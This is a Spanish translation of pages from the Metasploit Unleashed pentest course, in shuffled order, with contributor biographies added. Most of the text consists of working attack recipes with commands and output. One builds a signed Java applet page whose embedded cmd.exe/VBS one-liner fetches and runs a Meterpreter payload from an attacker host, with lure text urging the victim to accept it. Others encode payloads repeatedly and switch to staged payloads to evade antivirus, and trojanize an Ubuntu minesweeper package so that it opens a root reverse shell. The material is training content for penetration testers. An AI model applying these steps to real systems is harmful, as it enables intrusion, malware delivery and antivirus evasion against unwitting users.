[+] Generating key pairs
What is your first and last name? [Unknown]: MSFcmd
What is the name of your organizational unit? [Unknown]: Microsoft
What is the name of your organization? [Unknown]: Microsoft Organization
What is the name of your City or Locality? [Unknown]: Redmond
What is the name of your State or Province? [Unknown]: Washington
What is the two-letter country code for this unit? [Unknown]: US
Is CN=MSFcmd, OU=Microsoft, O=Microsoft Organization, L=Redmond, ST=Washington, C=US correct? [no]: yes

[+] Signing the JAR file

Warning:
The signer certificate will expire within six months.
[+] Exporting the public key certificate
Certificate stored in file
[+] Done


Ahora que ya todo esta preparado, desplegamos el archivo JAR y class.

root@bt4:/java-applet/# cp SignedMSFcmd.jar /var/www/

root@bt4:/java-applet/# cp MSFcmd.class /var/www/

root@bt4:/java-applet/# apache2ctl start


Ahora que el applet se ha desplegado, tendremos que crear un payload con Meterpreter. Cambia "X.X.X.X" en el ejemplo siguiente para que coincida con la direccion IP del atacante. Este comando utiliza msfpayload para crear un Reverse TCP Meterpreter Shell con nuestra victima. Generamos este payload en formato Raw y lo pasamos a traves de msfencode, salvamos el payload como ejecutable. El ejecutable lo copiamos a la raiz del directorio web y le damos permisos de ejecucion.

root@bt4:/pentest/exploits/framework3/# ./msfpayload windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 R | ./msfencode -t exe -o my.exe

root@bt4:/pentest/exploits/framework3/# cp ./my.exe /var/www/

root@bt4:/pentest/exploits/framework3/# chmod a+x /var/www/my.exe


Ahora tenemos que añadir un comando en el index.html que le permita al cliente descargar y ejecutar nuestro payload. Basicamente, esta pagina lanzara un applet de java firmado por nosotros mismos, que, cuando el cliente de permiso, este llamara al cmd.exe desde ese sistema, introduciendo lineas en un script vbs llamado "apsou.vbs". Este prevenido que este archivo puede ser encontrado en el sistema despues de tener exito y de "algunos" intentos fallidos. Despues que este archivo es creado, la misma cadena de comandos lanza el script vbs y pasa datos a una variable, el link atacante esta enlazado con el payload "my.exe". Una vez que el payload ha sido descargado, ejecutara my.exe con los permisos de usuarios.

Tenemos que modificar el index.html que nuestros clientes van ver. En un escenario de la vida real, un pentester podria agregar algun video, juegos de navegador, y otras actividades para distraer o entreter a la victima. Trucos inteligentes como Ingenieria Social pueden ser de gran ayuda, dirigiendo tus objetipos a una URL especifica y diciendole que acepte la advertencia de seguridad para continuar viendo la pagina o usar el "Secure applet IM Personalizado". Ademas tambien puedes tener payloads en diferentes carpetas esperando a clientes diferentes.

Escriba el comando de abajo como una sola linea y asegurese de cambiar el "X.X.X.X" por la IP atacante.

root@bt4:/pentest/exploits/framework3/# echo "<applet width='1' height='1' code='MSFcmd.class' archive='SignedMSFcmd.jar'>" > /var/www/index.html

root@bt4:/pentest/exploits/framework3/# echo "<param name='first' value='cmd.exe /c echo Const adTypeBinary = 1 > C:\windows\apsou.vbs & echo Const adSaveCreateOverWrite = 2 >> C:\windows\apsou.vbs & echo Dim BinaryStream >> C:\windows\apsou.vbs & echo Set BinaryStream = CreateObject("ADODB.Stream") >> C:\windows\apsou.vbs & echo BinaryStream.Type = adTypeBinary >> C:\windows\apsou.vbs & echo BinaryStream.Open >> C:\windows\apsou.vbs & echo BinaryStream.Write BinaryGetURL(Wscript.Arguments(0)) >> C:\windows\apsou.vbs & echo BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> C:\windows\apsou.vbs & echo Function BinaryGetURL(URL) >> C:\windows\apsou.vbs & echo Dim Http >> C:\windows\apsou.vbs & echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> C:\windows\apsou.vbs & echo Http.Open "GET", URL, False >> C:\windows\apsou.vbs & echo Http.Send >> C: windows\apsou.vbs & echo BinaryGetURL = Http.ResponseBody >> C:\windows\apsou.vbs & echo End Function >> C:\windows\apsou.vbs & echo Set shell = CreateObject("WScript.Shell") >> C:\windows\apsou.vbs & echo shell.Run "C:\windows\my.exe" >> C:\windows\apsou.vbs & start C:\windows\apsou.vbs http://X.X.X.X/my.exe C:\windows\my.exe'> </applet>" >> /var/www/index.html


Tambien agregaremos un mensaje que le indique al usuario que acepte nuestro applet malicioso.

root@bt4:/pentest/exploits/framework3/# echo "" >> /var/www/index.html

root@bt4:/pentest/exploits/framework3/# echo "Please wait. We appreciate your business. This process may take a while." >> /var/www/index.html

root@bt4:/pentest/exploits/framework3/# echo "To view this page properly you must accept and run the applet.
We are sorry for any inconvenience. " >> /var/www/index.html


Ahora tenemos que configurar el Metasploit multi/handler para escuchar los intentos de conexiones de los clientes. Vamos estar escuchando por un reverse shell desde el objetivo en el puerto 443. Este puerto esta asociado con el trafico HTTPS y la mayoria de los firewalls de las organizaciones permiten que este trafico salga de su red. Como antes, cambia el "X.X.X.X" por tu IP.

msf > use exploit/multi/handler
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST X.X.X.X
LHOST => X.X.X.X
msf exploit(handler) > set LPORT 443
LPORT +> 443
msf exploit(handler) > save
Saved configuration to: /root/.msf3/config
msf exploit(handler) >exploit -j
[*] Exploit running as background job.
[*] Started reverse handler
[*] Starting the payload handler...


Cuando una victima navegue a nuestro sitio web y acepte la advertencia de seguridad, el payload de Meterpreter se ejecutara y se conectara de regreso al handler, a nosotros.

msf exploit(handler) >
[*] Sending stage   (718336 bytes)
[*] Meterpreter session 1 opened (A.A.A.A:443 -> T.T.T.T:44477)
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ps

Process list
============

     PID   Name           Path
     ---   ----           ----
     204   jusched.exe    C:\ProgramFiles\Java\jre6\bin\jusched.exe
     288   ctfmon.exe     C:\WINDOWS\system32\ctfmon.exe
     744   smss.exe       \SystemRoot\System32\smss.exe
     912   winlogon.exe     C:\WINDOWS\system32\winlogon.exe
     972   services.exe   C:\WINDOWS\system32\services.exe
     984   lsass.exe      C:\WINDOWS\system32\lsass.exe
     1176  svchost.exe    C:\WINDOWS\system32\svchost.exe
     1256  java.exe       C:\Program Files\Java\jre6\bin\java.exe
     1360    svchost.exe    C:\WINDOWS\System32\svchost.exe
     1640  spoolsv.exe    C:\WINDOWS\system32\spoolsv.exe
     1712  Explorer.EXE   C:\WINDOWS\Explorer.EXE
     1872  jqs.exe        C:\Program Files\Java\jre6\bin\jqs.exe
     2412  my.exe         C:\windows\my.exe
     3052  iexplore.exe     C:\Program Files\Internet Explorer\iexplore.exe

meterpreter >


Como nota final, si tienes problemas obteniedo acceso, asegurate que los archivos

'C:\windows\apsou.vbs'
and
'C:\windows\my.exe'


NO exista en tu objetivo.

Si intentas volver a usar el exploit en este cliente, no podras iniciar correctamente el script vbs.

Si sigues experimentado problemas y te has asegurado que los archivos de arriba no estan en el sistema, por favor revisa la siguiente localizacion en el registro y haz los cambios necesarios.


Start > run : regedit


navigate to:
HKLM\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only

change value to: 0

navigate to:
HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags

click Decimal
change value to 3

navigate to:
HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\

make new dword with the name 1C00
value in hex 10000

navigate to:
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags

click Decimal
change value to 3

Ahora cerramos regedit e iniciamos o reiniciamos el IE y la nueva configuracion se deberia aplicar.



© Offensive Security 2009

  • Original by www.offensive-security.com
  • Traslated by Jhyx

Metasploit Unleashed en Espanol (16.3/18)

7.3.10

Un Poco sobre Payloads

Debido a la gran cantidad de exploit actualmente disponibles en Metasploit, hay un buen chance de que exista un modulo que tu simplemente puedas editar para tus propositos durante el desarrollo del exploit. Para hacer el desarrollo del exploit facil, Metasploit incluye un exploit de ejemplo que puedes modificar. Lo puedes encontrar en "documentation/samples/modules/exploits/".

Metasploit contiene una gran variedad de tipos de payload diferentes, cada uno cumple con una unica funcion en el framework. Echemos un breve vistazo a los distintos tipos de payloads disponibles y tener una idea de cuando usar cada tipo.

  • En linea (No Staged)

    • Un simple payload que contiene el exploit y el codigo shell completo para la tarea seleccionada. Los payload en linea son diseñados mas estables que su contraparte debido a que contiene todo en uno. Sin embargo, algunos exploits no soportan el tamaño resultante de estos payloads.
  • Staged

    • Stager payloads trabajan en conjunto con los stage payloads con el fin de realizar una tarea especifica. Un stager establece un canal de comunicacion entre el atacante y la victima, y lee el stage payload para ejecutarlo en el host remoto.
  • Meterpreter

    • Meterpreter, es la forma corta de Meta-Interpreter, es un payload avanzado, con multiples faces que opera a travez de la inyeccion dll.  El Meterpreter reside completamente en la memoria del host remoto y no deja rastros en el disco duro, haciendolo muy dificil de detectar con tecnicas forenses convencionales. Scripts y plugins pueden ser activados y desactivados dinamicamente como se requiera, el desarrollo de Meterpreter es muy fuerte y esta en constante evolucion.
  • PassiveX

    • PassiveX es un payload que puede ayudar en evadir salidas restrictivas de firewalls. Esto se hace usando un control ActiveX para crear una instancia oculta de Internet Explorer. Usando el nuevo control ActiveX, se hace una comunicacion con el atacante a traves de peticiones y respuestas HTTP.
  • NoNX
    • El NX (No eXecute) bit es una caracteristica incorporada en algunos CPUs para prevenir ejecucion de codigo en ciertas areas de la memoria. En Windows, NX es implementado como Data Execution Prevention (DEP).
    • Los payloads NoNX de Metasploit estan diseñados para evadir el DEP.
  • Orb
    • Los payloads Ordinarios son payloads stager de Windows que tienen ventajas y desventajas. Las ventajas es que funciona en todos los sabores y lenguajes de Windows desde Windows 9x, sin definir explicitamente la direccion de return. Tambien son extremadamente pequeños.
    • Sin embargo, dos desventajas muy especificas que no la hacen la opcion por defecto. La primera es que depende del hecho de cargar ws2_32.dll en el proceso de explotacion antes de la explotacion. El segundo es que es un poco menos estable que los otros stagers.
  • IPv6
    • Los payloads IPv6 de Metasploit, como su nombre lo indica, estan construidos para funcionar en redes IPv6.
  • Inyeccion DLL reflexivo


© Offensive Security 2009

  • Original by www.offensive-security.com
  • Traslated by Jhyx

Metasploit Unleashed en Espanol (8.2/18)

Antivirus Bypass

Como hemos visto, el binario del payloads de Metasploit funciona bien. Sin embargo, hay una pequeña complicacion.

La mayoria de los sistemas basados en Windows ejecutan alguna proteccion anti-virus, debido a los ataques generalizados de software maliciosos a esta plataforma. Hagamos nuestro ejemplo un poco mas realista, he instalemos la version gratuita de AVG en el sistema y veamos que sucede.

Photobucket

Inmediatamente, se detecta nuestro payload. Vamos a ver si hay algo que podamos hacer para evitar que sea detectado por AVG.

Vamos a codificar nuestro ejecutable en un intento de hacerlo mas dificil de ser descubierto. Hemos utilizamos la codificacion antes cuando explotamos software evitando caracteres dañados, veamos si podemos usarlo aqui. Usaremos el programa de linea de comando msfencode. Veamos alguna de las opciones ejecutando msfencode con el parametro "-h".

root@bt4:/pentest/exploits/framework3# ./msfencode -h

Usage: ./msfencode

OPTIONS:

-a The architecture to encode as
-b The list of characters to avoid: 'x00xff'
-c The number of times to encode the data
-e The encoder to use
-h Help banner
-i Encode the contents of the supplied file path
-l List available encoders
-m Specifies an additional module search path
-n Dump encoder information
-o The output file
-s The maximum size of the encoded data
-t The format to display the encoded buffer with (raw, ruby, perl, c, exe, vba)


Veamos que codificadores estan disponibles ejecutando "msfencode -l".

root@bt4:/pentest/exploits/framework3# ./msfencode -l

Framework Encoders
==================

Name Rank Description
---- ---- -----------
cmd/generic_sh normal Generic Shell Variable Substitution Command Encoder
generic/none normal The "none" Encoder
mipsbe/longxor normal XOR Encoder
mipsle/longxor normal XOR Encoder
php/base64 normal PHP Base64 encoder
ppc/longxor normal PPC LongXOR Encoder
ppc/longxor_tag normal PPC LongXOR Encoder
sparc/longxor_tag normal SPARC DWORD XOR Encoder
x86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_utf8_tolower manual Avoid UTF8/tolower
x86/call4_dword_xor normal Call+4 Dword XOR Encoder
x86/countdown normal Single-byte XOR Countdown Encoder
x86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive great Polymorphic Jump/Call XOR Additive Feedback Encoder
x86/nonalpha low Non-Alpha Encoder
x86/nonupper low Non-Upper Encoder
x86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoder
x86/unicode_mixed manual Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper manual Alpha2 Alphanumeric Unicode Uppercase Encoder


Excelente. Podemos ver las opciones y algunos codificadores que le podemos dar uso. Vamos a usar la salida sin depurar del msfpayload y lo pasamos como entrada a msfencode usando "shikata ga nai encoder" (traducido como "no puede ser ayudado" o "nada se puede hacer"). Desde ahi, saldra el binario de windows.

root@bt4:/pentest/exploits/framework3# ./msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 R | ./msfencode -e x86/shikata_ga_nai -t exe > /tmp/2.exe

[*] x86/shikata_ga_nai succeeded with size 315 (iteration=1)

root@bt:/pentest/exploits/framework3# file /tmp/2.exe

/tmp/2.exe: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit


Perfecto! Ahora transferimos el binario al otro sistema y vemos que pasa. Y...

Photobucket

Eso no es bueno. Todavia sigue siendo detectado por AVG. Bueno, no podemos dejar que gane AVG, verdad? Vamos a ponernos un poco loco, y usar tres diferentes codificadores, dos de los cuales le diremos que sea ejecutado 10 veces cada uno, para un total de 21 codificaciones. Esto es toda la codificacion que podemos hacer y seguir teniendo en funcionamiento el binario . AVG no podra con esto!

root@bt4:/pentest/exploits/framework3# ./msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 R | ./msfencode -e x86/shikata_ga_nai -t raw -c 10 | ./msfencode -e x86/call4_dword_xor -t raw -c 10 | ./msfencode -e x86/countdown -t exe > /tmp/6.exe
[*] x86/shikata_ga_nai succeeded with size 315 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 342 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 369 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 396 (iteration=4)

[*] x86/shikata_ga_nai succeeded with size 423 (iteration=5)

[*] x86/shikata_ga_nai succeeded with size 450 (iteration=6)

[*] x86/shikata_ga_nai succeeded with size 477 (iteration=7)

[*] x86/shikata_ga_nai succeeded with size 504 (iteration=8)

[*] x86/shikata_ga_nai succeeded with size 531 (iteration=9)

[*] x86/shikata_ga_nai succeeded with size 558 (iteration=10)

[*] x86/call4_dword_xor succeeded with size 586 (iteration=1)

[*] x86/call4_dword_xor succeeded with size 614 (iteration=2)

[*] x86/call4_dword_xor succeeded with size 642 (iteration=3)

[*] x86/call4_dword_xor succeeded with size 670 (iteration=4)

[*] x86/call4_dword_xor succeeded with size 698 (iteration=5)

[*] x86/call4_dword_xor succeeded with size 726 (iteration=6)

[*] x86/call4_dword_xor succeeded with size 754 (iteration=7)

[*] x86/call4_dword_xor succeeded with size 782 (iteration=8)

[*] x86/call4_dword_xor succeeded with size 810 (iteration=9)

[*] x86/call4_dword_xor succeeded with size 838 (iteration=10)

[*] x86/countdown succeeded with size 856 (iteration=1)

root@bt4:/pentest/exploits/framework3# file /tmp/6.exe
/tmp/6.exe: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit


Ok, copiamos el binario, lo ejecutamos yyyyy....

Photobucket

Fracasamos! Sigue siendo detectado por AVG! Como vamos a pasar esto?
Bueno, resulta que hay una buena razon para eso. Metasploit soporta dos tipos diferentes de payloads. El primero, como "windows/shell_reverse_tcp" contiene todo el codigo necesario por el payload. El otro, como "windows/shell/reverse_tcp" funciona un poco diferente. "windows/shell/reverse_tcp" contiene solo el codigo suficiente para abrir una conexion de red, entonces el stage carga el resto de codigo requerido por el exploit desde la maquina de los atacantes. En el caso de "windows/shell/reverse_tcp", hace una conexion de vuelta hacia el sistema atacante, el resto del payload es cargado en memoria, y luego se nos abre un interprete shell.

Entonces, que significa esto para los antivirus? Bueno, la mayoria de los antivirus funcionan con una tecnologia a base de firmas. El codigo utilizado por "windows/shell_reverse_tcp" se compara con esas firmas y es marcado por AVG de inmediato. Por otra parte, el staged payload, "windows/shell/reverse_tcp" no contiene la firma que busca AVG, y por eso, pasa sin darse cuenta. Ademas, al contener menos codigo, el anti-virus tiene menos con que trabajar, y si la firma es demaciado generica, habran muchos falsos positivos y frustaran a los usuarios cuando activen un software no malicioso.

Con eso en mente, vamos a generar un staged payload "windows/shell/reverse_tcp" como ejecutable.

root@bt4:/pentest/exploits/framework3# ./msfpayload windows/shell/reverse_tcp LHOST=172.16.104.130 LPORT=31337 X > /tmp/7.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell/reverse_tcp
Length: 278
Options: LHOST=172.16.104.130,LPORT=31337

root@bt4:/pentest/exploits/framework3# file /tmp/7.exe
/tmp/7.exe: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit


Ok, ahora lo copiamos en el sistema remoto y lo ejecutamos, para ver que sucede.

root@bt4:/pentest/exploits/framework3# ./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=172.16.104.130 LPORT=31337 E
[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Sending stage (474 bytes)
[*] Command shell session 1 opened (172.16.104.130:31337 -> 172.16.104.128:1548)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Jim\My Documents>dir
dir
Volume in drive C has no label.
Volume Serial Number is E423-E726

Directory of C:\Documents and Settings\Jim\My Documents

05/27/2009 09:56 PM
.
05/27/2009 09:56 PM
..
05/25/2009 09:36 PM 9,728 7.exe
05/25/2009 11:46 PM
Downloads
10/29/2008 05:55 PM
My Music
10/29/2008 05:55 PM
My Pictures
1 File(s) 9,728 bytes
5 Dir(s) 38,655,614,976 bytes free

C:\Documents and Settings\Jim\My Documents>


Exito! el Antivirus no se activo con este nuevo staged payload. Hemos logrado evadir el antivirus del sistema, y ejecutado el payload.



© Offensive Security 2009

  • Original by www.offensive-security.com
  • Traslated by Jhyx

Metasploit Unleashed en Espanol (8.3/18)

4.3.10

Binario de Trojanos en Linux


A fin de demostrar que los ataques client side y troyanos no son exclusimos en el mundo de Windows, se cargara un paquete en el payload de Metasploit con un paquete .deb de Ubuntu para que nos de una shell en Linux.

Un excelente video fue hecho por Redmeat_uk demostrando esta tecnica que puedes ver en http://securitytube.net/Ubuntu-Package-Backdoor-using-a-Metasploit-Payload-video.aspx

Primero tenemos que descargar el paquete que vamos a infectar y mover a un directorio temporal de trabajo. En nuestro ejemplo, vamos a utilizar el paquete "freesweep", una version de texto del Buscaminas.

root@bt4:/pentest/exploits/framework3# apt-get --download-only install freesweep
Reading package lists... Done
Building dependency tree
Reading state information... Done
...snip...
root@bt4:/pentest/exploits/framework3# mkdir /tmp/evil
root@bt4:/pentest/exploits/framework3# mv /var/cache/apt/archives/freesweep_0.90-1_i386.deb /tmp/evil
root@bt4:/pentest/exploits/framework3# cd /tmp/evil/
root@bt4:/tmp/evil#


A continuacion, extraemos el paquete a un directorio de trabajo y creamos en directorio DEBIAN para agregar las "caracteristicas" adicionales.

root@v-bt4-pre:/tmp/evil# dpkg -x freesweep_0.90-1_i386.deb work
root@v-bt4-pre:/tmp/evil# mkdir work/DEBIAN


En el directorio "DEBIAN", cree un archivo llamado "control" que contendra lo siguiente:

root@bt4:/tmp/evil/work/DEBIAN# cat control
Package: freesweep
Version: 0.90-1
Section: Games and Amusement
Priority: optional
Architecture: i386
Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com)
Description: a text-based minesweeper
Freesweep is an implementation of the popular minesweeper game, where
one tries to find all the mines without igniting any, based on hints given
by the computer. Unlike most implementations of this game, Freesweep
works in any visual text display - in Linux console, in an xterm, and in
most text-based terminals currently in use.


Tambien tenemos que crear script de post-instalacion que ejecutara nuestro binario. En "DEBIAN", creamos un archivo llamado "postinst" que contiene lo siguiente:

root@bt4:/tmp/evil/work/DEBIAN# cat postinst
#!/bin/sh

sudo chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores & /usr/games/freesweep &


Ahora vamos a crear nuestro payload malicioso. Creamos una shell inversa para que se conecte de nuevo a nosotros llamada "freesweep_scores".

root@bt4:/pentest/exploits/framework3# ./msfpayload linux/x86/shell/reverse_tcp LHOST=192.168.1.101 LPORT=443 X > /tmp/evil/work/usr/games/freesweep_scores
Created by msfpayload (http://www.metasploit.com).
Payload: linux/x86/shell/reverse_tcp
Length: 50
Options: LHOST=192.168.1.101,LPORT=443


Ahora hacemos ejecutable el script de post-instalacion y construimos un nuevo paquete. El archivo de construccion sera llamado "work.deb", lo cambiamos a "freesweep.deb" y copiamos el paquete a la raiz del directorio web.

root@bt4:/tmp/evil/work/DEBIAN# chmod 755 postinst
root@bt4:/tmp/evil/work/DEBIAN# dpkg-deb --build /tmp/evil/work
dpkg-deb: building package `freesweep' in `/tmp/evil/work.deb'.
root@bt4:/tmp/evil# mv work.deb freesweep.deb
root@bt4:/tmp/evil# cp freesweep.deb /var/www/


Si no se esta ejecutando, tendremos que iniciar el servidor web Apache.

root@bt4:/tmp/evil# /etc/init.d/apache2 start

Tendremos que configurar en Metasploit el multi/handler para que reciba las conexiones entrantes.

root@bt4:/pentest/exploits/framework3# ./msfcli exploit/multi/handler PAYLOAD=linux/x86/shell/reverse_tcp LHOST=192.168.1.101 LPORT=443 E
[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...


A nuestra victima de Ubuntu, tendremos de alguna manera convencerla para que descargue e instala nuestro fantastico y nuevo juego.

ubuntu@ubuntu:~$ wget http://192.168.1.101/freesweep.deb

ubuntu@ubuntu:~$ sudo dpkg -i freesweep.deb


Mientras la victima instala y juega nuestro juego, nosotros recibiremos una shell!

[*] Sending stage (36 bytes)
[*] Command shell session 1 opened (192.168.1.101:443 -> 192.168.1.175:1129)

ifconfig
eth1 Link encap:Ethernet HWaddr 00:0C:29:C2:E7:E6
inet addr:192.168.1.175 Bcast:192.168.1.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:49 errors:0 dropped:0 overruns:0 frame:0
TX packets:51 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:43230 (42.2 KiB) TX bytes:4603 (4.4 KiB)
Interrupt:17 Base address:0x1400
...snip...

hostname
ubuntu
id
uid=0(root) gid=0(root) groups=0(root)



© Offensive Security 2009

  • Original by www.offensive-security.com
  • Traslated by Jhyx

Metasploit Unleashed en Espanol (18.9/18)

Matteo Memelli, aka ryujin, ama el espagueti y el pwnsauce*




*No se exactamente a que se refiere:
1.- Puede ser a una salsa para espaguetis.
2.- Tambien puede ser referencia a BackTrack 4, nombre clave "pwnsauce".
3.- O el owned de otra forma...


© Offensive Security 2009

  • Original by www.offensive-security.com
  • Traslated by Jhyx

Metasploit Unleashed en Espanol (18.8/18)

Muts

Photobucket


Que ?? Que pensastes que ibas a encontrar ?


© Offensive Security 2009

  • Original by www.offensive-security.com
  • Traslated by Jhyx

Metasploit Unleashed en Espanol (18.7/18)

Max esta trabajando desde hace años en la industria de Seguridad IT. El es bien conocido por sus trabajos publicados en remote-exploit.org. El es uno de los autores originales de los liveCD enfocados en seguridad y su sucesor llamado backtrack. Actualmente Max Moser es empleado de Dreamlab Technologies AG http://www.dreamlab.net como senior security expert.


© Offensive Security 2009

  • Original by www.offensive-security.com
  • Traslated by Jhyx

Metasploit Unleashed en Espanol (18.6/18)

William "SubINacls" Coppola, comenzo su aventura en las computadoras a la madura edad de 10 años, y fue empleado a los 13 años por un amigo en un taller de reparacion de componentes electronicos.

Muchos años despues se unio al Ejercito de Estados Unidos calificando como Paracaidista, Administrador de Red y adquiriendo una licencia de investigador privado a los edad 21 años. Mas conocido por ayudar a reunir madres con sus hijos despues de un secuestro y muchas otras habilidades de rastreo incluyendo recuperacion de bienes perdidos o robados. Incorporando muchas de las habilidades y rasgos de mentalidad hacker en su vida dandole sin precedentes la habilidad de pensar fuera de la caja y con metodos no convencionales fue capaz de completar tareas donde otros no fueron tan afortunados.

SubINacls gano su OSCP en el 2008 y el mismo año aquirio el GPEN.

---

"Cuando haces las cosas bien, las personas no estaran seguras de que hayas hecho algo en absoluto".



© Offensive Security 2009

  • Original by www.offensive-security.com
  • Traslated by Jhyx

Metasploit Unleashed en Espanol (18.5/18)

Devon Kearns (dookie) anteriormente sirvio como Tecnico en Sistema de Comunicacion e Informacion en el Ejercito Canadiense. El sirvio en Afghanistan trabajando principalmente en radio de largo alcance y comunicaciones por satelite. Una lesion en la espalda corta su carrera militar pero lo llevo a una posicion como Analista de Seguridad IS en el servicio publico, lo que le permite seguir su verdadera pasion en el campo de la Seguridad de la Informacion mientras sirve a su nacion. Como recien llegado al mundo de la informacion de la seguridad, Devon esta trabajando duro para "ponerse al dia" y actualmente tiene las certificaciones OSCP, OSWP, GCIH, GCFA, y GSEC.

Devon puede ser encontrado en el Twitter, IRC y Linkedln como "dookie2000ca" y postea ocacionalmente videos en dookie.dkearns.ca.



© Offensive Security 2009

  • Original by www.offensive-security.com
  • Traslated by Jhyx

Metasploit Unleashed en Espanol (18.4/18)

David "Darkangel" Ovitz

en freenode es soddarkangel.

He estado programando desde mi infancia y profesionalmente desde 1999. He estado en el lado defensivo de la seguridad desde hace tiempo, pero descubri que puedo aprender mucho mas del lado ofensivo. Soy nuevo en seguridad ofensiva, realmente ayuda desde el punto de vista defensivo si tu quieres saber realmente que esta pasando. No tengo mucho que decir sobre mi, pero este curso es realmente bueno, y me involucre para ayudar en HFC, pienso que una gran causa. Tambien pienso que todas las personas involucradas con computadoras profesionalmente de alguna manera deben aprender sobre hardware, software, redes, seguridad y cualquier cosa que pueda aprender. He descubierto que cuanto mas sepa sobre todo el proceso, todo tendra mas sentido en cada parte del rompecabezas.



© Offensive Security 2009

  • Original by www.offensive-security.com
  • Traslated by Jhyx

Metasploit Unleashed en Espanol (18.3/18)

Jim, tambien conocido como _Elwood_ en el irc, puede ser encontrado en linea en elwood.net y en social_enginner.org.


© Offensive Security 2009

  • Original by www.offensive-security.com
  • Traslated by Jhyx

Metasploit Unleashed en Espanol (18.2/18)

Carlos Perez (Darkoperator) es un Arquitecto de Soluciones para una empresa de Integracion IT, el ha trabajo en el campo de seguridad para Compaq, HP y es un contratista interno para Microsoft. Ademas, es un colaborador al proyecto de Metasploit en el area de post explotacion usando el payload Meterpreter escribiendo varios scripts incluidos en el proyecto, tambien es miembro del podcast Pauldotcom Security Weekly en http://www.pauldotcom.com. Muchos de sus scripts y otras herramientas pueden ser encontradas en http://www.darkoperator.com, es un MSCSE, MCDBA, CCDA, Security +, A+, Network+, Linux+ y otros certificaciones de recursos humanos haciendo una sopa de letras.



© Offensive Security 2009

  • Original by www.offensive-security.com
  • Traslated by Jhyx

Metasploit Unleashed en Espanol (18.1/18)

David Kennedy (ReL1K) es el autor de las herramientas Fast-Track y Social-Engineering y ha estado ayudando a la comunidad open source desde hace varios años. David contribuye a la muy popular distribucion de seguridad Back|Track, ayudando con la base de datos de exploit (exploit-db.com), y es uno de los principales colaboradores del framework social-enginner.org. David tambien es frecuentemente invitado al podcast Security Justice y PaulDotCom.

David tiene un pesado pasado en seguridad de la informacion y pruebas de penetracion para gran un numero de organizaciones multi-millonarias y fue Socio y Vice-Presidente de consultoria para una exitosa compania de Consultoria de Seguridad de la Informacion. Antes de consultor, David trabajo en Inteligencia para el Cuerpo de Marines de Estados Unidos en Hawaii. Por ultimo, David ha presentado en grandes conferencias como "Defcon", "Shmoocon", y "Notacon".


© Offensive Security 2009

  • Original by www.offensive-security.com
  • Traslated by Jhyx

Metasploit Unleashed en Espanol (8.1/18)

Binarios de un Payload

Mestaploit esta lleno de caracteristicas interesantes y utiles. Una de ellas  es la habilidad para generar ejecutables de un payload desde Metasploit. Esto puede ser muy util en situaciones tales como ingenieria social, si puedes hacer que un usuario ejecute tu payload por ti, entonces no hay ninguna razon para pasar por un problema de explotacion de software.

Veamos un rapido ejemplo de como hacerlo. Vamos a usar un payload de shell inverso, ejecutado en un sistema remoto para obtener nuestra shell. Para hacer esto de forma correcta, usamos la herramienta de linea de comandos msfpayload. Este comando es usado para generar payloads para ser utilizados en muchas situaciones y ofreciendo una variedad de opciones de salida, desde perl pasando por C hasta el codigo fuente sin depurar. Estamos interesados en la salida del ejecutable, que es proporcionado por el comando X.

Generaremos un ejecutable de Windows de shell inversa que se conecte de nuevo a nosotros a traves del puerto 31337. Observe que msfpayload funciona del mismo modo que msfcli en donde puede añadir la letra "O" al final de la cadena de comando para ver que opciones estan disponibles.

root@bt4:/pentest/exploits/framework3# ./msfpayload windows/shell_reverse_tcp O

Name: Windows Command Shell, Reverse TCP Inline
Version: 6479
Platform: Windows
Arch: x86
Needs Admin: No
Total size: 287

Provided by:
vlad902 vlad902@gmail.com

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC seh yes Exit technique: seh, thread, process
LHOST yes The local address
LPORT 4444 yes The local port

Description:
Connect back to attacker and spawn a command shell

root@bt4:/pentest/exploits/framework3# ./msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 O

Name: Windows Command Shell, Reverse TCP Inline
Version: 6479
Platform: Windows
Arch: x86
Needs Admin: No
Total size: 287

Provided by:
vlad902 vlad902@gmail.com

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC seh yes Exit technique: seh, thread, process
LHOST 172.16.104.130 yes The local address
LPORT 31337 yes The local port

Description:
